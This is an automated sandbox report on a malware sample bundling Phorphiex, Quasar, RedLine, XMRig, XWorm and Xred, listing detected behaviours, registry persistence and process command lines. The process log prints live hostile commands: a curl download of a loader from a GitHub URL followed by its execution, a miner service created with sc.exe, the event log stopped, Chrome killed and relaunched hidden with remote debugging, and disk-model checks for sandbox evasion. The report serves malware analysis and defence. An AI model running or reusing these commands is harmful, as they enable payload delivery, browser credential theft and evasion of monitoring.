Malware Analysis Report

2025-05-05 21:49

Sample ID 250416-h7whsatmx6
Target 4363463463464363463463463.zip.zip
SHA256 12fce52d084a8c7efa638c88fa2307bca7c038a49fe566ebb05533cacf17efbd
Tags
xred phorphiex quasar redline xmrig xworm dasad office04 roblox executor backdoor credential_access defense_evasion discovery execution infostealer loader miner persistence pyinstaller rat spyware stealer trojan upx worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

12fce52d084a8c7efa638c88fa2307bca7c038a49fe566ebb05533cacf17efbd

Threat Level: Known bad

The file 4363463463464363463463463.zip.zip was found to be: Known bad.

Malicious Activity Summary

xred phorphiex quasar redline xmrig xworm dasad office04 roblox executor backdoor credential_access defense_evasion discovery execution infostealer loader miner persistence pyinstaller rat spyware stealer trojan upx worm

Phorphiex, Phorpiex

Xred family

xmrig

Quasar payload

Quasar RAT

Quasar family

RedLine

Xred

Xworm

Phorphiex family

Detect Xworm Payload

Xworm family

Redline family

Phorphiex payload

RedLine payload

Xmrig family

XMRig Miner payload

Modifies Windows Firewall

Downloads MZ/PE file

Creates new service(s)

Uses browser remote debugging

Stops running service(s)

Executes dropped EXE

Cryptocurrency Miner

.NET Reactor proctector

Adds Run key to start application

Power Settings

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Indicator Removal: File Deletion

Drops file in System32 directory

AutoIT Executable

UPX packed file

Launches sc.exe

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Detects Pyinstaller

Delays execution with timeout.exe

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Modifies registry class

Kills process with taskkill

Suspicious behavior: AddClipboardFormatListener

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-04-16 07:23

Signatures

Xred family

xred

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-04-16 07:23

Reported

2025-04-16 07:25

Platform

win11-20250410-en

Max time kernel

5s

Max time network

99s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Phorphiex family

phorphiex

Phorphiex payload

Description Indicator Process Target
N/A N/A N/A N/A

Phorphiex, Phorpiex

worm trojan loader phorphiex

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Xmrig family

xmrig

Xred

backdoor xred

Xred family

xred

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates new service(s)

persistence execution

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Stops running service(s)

defense_evasion execution

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Cryptocurrency Miner

miner

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A api.ipify.org N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\._cache_Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe N/A
File opened for modification C:\Windows\SysWOW64\._cache_Synaptics.exe C:\ProgramData\Synaptics\Synaptics.exe N/A
File created C:\Windows\SysWOW64\Files\fern_wifi_recon%252.34.exe C:\Windows\SysWOW64\._cache_Synaptics.exe N/A
File created C:\Windows\SysWOW64\Files\XClient.exe C:\Windows\SysWOW64\._cache_Synaptics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Synaptics\Synaptics.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Synaptics\Synaptics.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\._cache_Synaptics.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\Files\fern_wifi_recon%252.34.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\ProgramData\Synaptics\Synaptics.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\ProgramData\Synaptics\Synaptics.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\._cache_Synaptics.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Files\asdasdasdasdasd.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\asdasdasdasdasd.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\asdasdasdasdasd.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5520 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe
PID 5520 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe
PID 5520 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe
PID 5520 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 5520 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 5520 wrote to memory of 3896 N/A C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 5208 wrote to memory of 5524 N/A C:\Windows\system32\cmd.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 5208 wrote to memory of 5524 N/A C:\Windows\system32\cmd.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 5208 wrote to memory of 5524 N/A C:\Windows\system32\cmd.exe C:\ProgramData\Synaptics\Synaptics.exe
PID 3896 wrote to memory of 5812 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 3896 wrote to memory of 5812 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 3896 wrote to memory of 5812 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
PID 5524 wrote to memory of 1520 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Windows\SysWOW64\._cache_Synaptics.exe
PID 5524 wrote to memory of 1520 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Windows\SysWOW64\._cache_Synaptics.exe
PID 5524 wrote to memory of 1520 N/A C:\ProgramData\Synaptics\Synaptics.exe C:\Windows\SysWOW64\._cache_Synaptics.exe
PID 1520 wrote to memory of 3944 N/A C:\Windows\SysWOW64\._cache_Synaptics.exe C:\Windows\SysWOW64\Files\fern_wifi_recon%252.34.exe
PID 1520 wrote to memory of 3944 N/A C:\Windows\SysWOW64\._cache_Synaptics.exe C:\Windows\SysWOW64\Files\fern_wifi_recon%252.34.exe
PID 1520 wrote to memory of 3944 N/A C:\Windows\SysWOW64\._cache_Synaptics.exe C:\Windows\SysWOW64\Files\fern_wifi_recon%252.34.exe
PID 3752 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\asdasdasdasdasd.exe
PID 3752 wrote to memory of 2672 N/A C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe C:\Users\Admin\AppData\Local\Temp\Files\asdasdasdasdasd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe

"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"

C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_4363463463464363463463463.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Synaptics\Synaptics.exe

C:\ProgramData\Synaptics\Synaptics.exe

"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate

C:\ProgramData\Synaptics\Synaptics.exe

C:\ProgramData\Synaptics\Synaptics.exe

C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate

C:\Windows\SysWOW64\._cache_Synaptics.exe

"C:\Windows\system32\._cache_Synaptics.exe"

C:\Windows\SysWOW64\Files\fern_wifi_recon%252.34.exe

"C:\Windows\System32\Files\fern_wifi_recon%252.34.exe"

C:\Users\Admin\AppData\Local\Temp\Files\asdasdasdasdasd.exe

"C:\Users\Admin\AppData\Local\Temp\Files\asdasdasdasdasd.exe"

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding

C:\Windows\SysWOW64\Files\XClient.exe

"C:\Windows\System32\Files\XClient.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Users\Admin\AppData\Local\Temp\Files\2r61ahry.exe

"C:\Users\Admin\AppData\Local\Temp\Files\2r61ahry.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2000 -prefsLen 27097 -prefMapHandle 2004 -prefMapSize 270279 -ipcHandle 2080 -initialChannelId {501c2eff-9c35-4d52-bc8e-2a8bd757ecb0} -parentPid 740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.740" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2428 -prefsLen 27133 -prefMapHandle 2432 -prefMapSize 270279 -ipcHandle 2440 -initialChannelId {b31a04cd-6cb2-4133-8b6d-1b1fa3108df6} -parentPid 740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket

C:\Users\Admin\AppData\Local\Temp\Files\drchoe.exe

"C:\Users\Admin\AppData\Local\Temp\Files\drchoe.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3848 -prefsLen 27323 -prefMapHandle 3852 -prefMapSize 270279 -jsInitHandle 3856 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3864 -initialChannelId {dd7711ec-856a-4061-a752-841d919d2e7b} -parentPid 740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4064 -prefsLen 27323 -prefMapHandle 4068 -prefMapSize 270279 -ipcHandle 4180 -initialChannelId {1c9df6d1-9d89-4623-93a9-12f1849b8e6f} -parentPid 740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.740" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3244 -prefsLen 34822 -prefMapHandle 3180 -prefMapSize 270279 -jsInitHandle 3232 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3108 -initialChannelId {12ea25b1-f715-479d-af43-8ccf6b0dfb2d} -parentPid 740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4836 -prefsLen 34929 -prefMapHandle 4840 -prefMapSize 270279 -ipcHandle 4848 -initialChannelId {23b5d33b-8b73-41af-b3ca-1d5be3716478} -parentPid 740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "VJAODQWN"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "VJAODQWN" binpath= "C:\ProgramData\ztngybkovyeb\qsjxfirefkza.exe" start= "auto"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4676 -prefsLen 32900 -prefMapHandle 3228 -prefMapSize 270279 -jsInitHandle 3220 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2604 -initialChannelId {c02d753a-e71a-4c10-b6c8-b71f20294fe1} -parentPid 740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5324 -prefsLen 32952 -prefMapHandle 5328 -prefMapSize 270279 -jsInitHandle 5332 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3228 -initialChannelId {d82145f0-2223-438a-8be2-29a640504ed3} -parentPid 740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5540 -prefsLen 32952 -prefMapHandle 5544 -prefMapSize 270279 -jsInitHandle 5548 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5244 -initialChannelId {c9621ab9-7f9f-42e9-9e0e-66cf3356b680} -parentPid 740 -crashReporter "\\.\pipe\gecko-crash-server-pipe.740" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "VJAODQWN"

C:\ProgramData\ztngybkovyeb\qsjxfirefkza.exe

C:\ProgramData\ztngybkovyeb\qsjxfirefkza.exe

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\AppData\Local\Temp\Files\2020.exe

"C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"

C:\Users\Admin\AppData\Local\Temp\Files\2020.exe

"C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"

C:\Users\Admin\AppData\Local\Temp\Files\OGFN%20Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Files\OGFN%20Updater.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c echo off

C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe

"C:\Users\Admin\AppData\Local\Temp\Files\Pichon.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Users\Admin\AppData\Local\Temp\Files\InfinityCrypt.exe

"C:\Users\Admin\AppData\Local\Temp\Files\InfinityCrypt.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Loli169.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\_MEI44602\Blsvr.exe

C:\Users\Admin\AppData\Local\Temp\_MEI44602\Blsvr.exe

C:\Users\Admin\AppData\Local\Temp\_MEI44602\Blsvr.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\mapper.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\driver.sys

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\dwareinj.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\injectorold.exe

C:\Windows\SysWOW64\Files\App.exe

"C:\Windows\System32\Files\App.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c del C:\Windows\Temp\dwareogfn.dll

C:\Windows\SysWOW64\Files\App.exe

"C:\Windows\System32\Files\App.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c curl -o C:\Windows\Temp\loader.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/loader.exe --silent > nul 2>&1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\curl.exe

curl -o C:\Windows\Temp\loader.exe https://raw.githubusercontent.com/LeakerByDragon1/LeakerByDragon1/main/loader.exe --silent

C:\Windows\SysWOW64\Files\testingfile.exe

"C:\Windows\System32\Files\testingfile.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Users\Admin\AppData\Local\Temp\Files\main.exe

"C:\Users\Admin\AppData\Local\Temp\Files\main.exe"

C:\Users\Admin\AppData\Local\Temp\Files\main.exe

"C:\Users\Admin\AppData\Local\Temp\Files\main.exe"

C:\Users\Admin\AppData\Local\Temp\Files\SQL.exe

"C:\Users\Admin\AppData\Local\Temp\Files\SQL.exe"

C:\Users\Admin\AppData\Local\Temp\Files\splwow64_1.exe

"C:\Users\Admin\AppData\Local\Temp\Files\splwow64_1.exe"

C:\Windows\SYSTEM32\taskkill.exe

taskkill /F /IM chrome.exe

C:\Windows\SysWOW64\Files\JJSPLOIT.V2.exe

"C:\Windows\System32\Files\JJSPLOIT.V2.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffd6cbdcf8,0x7fffd6cbdd04,0x7fffd6cbdd10

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Windows\Temp\loader.exe

C:\Windows\Temp\loader.exe

C:\Windows\Temp\loader.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=2016,i,12434169305506559222,5732814844031997283,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=1996 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --string-annotations --field-trial-handle=1856,i,12434169305506559222,5732814844031997283,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2036 /prefetch:11

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --string-annotations --field-trial-handle=2124,i,12434169305506559222,5732814844031997283,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2352 /prefetch:13

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

